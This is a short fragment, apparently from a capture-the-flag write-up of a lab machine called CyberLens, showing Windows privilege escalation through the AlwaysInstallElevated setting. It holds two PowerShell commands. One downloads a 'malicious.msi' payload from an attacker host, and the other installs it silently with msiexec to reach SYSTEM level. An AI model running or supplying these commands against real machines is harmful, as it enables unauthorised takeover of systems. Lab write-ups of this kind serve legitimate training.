AlwaysInstallElevated
The CyberLens(10.10.53.112) host has CyberLens enabled.
PS C:\tmp> curl http://10.9.0.130/malicious.msi -OutFile .\malicious.msiTransferring the MSI payload
PS C:\tmp> msiexec.exe /quiet /qn /i C:\tmp\malicious.msiInstalling the MSI payload
System level compromise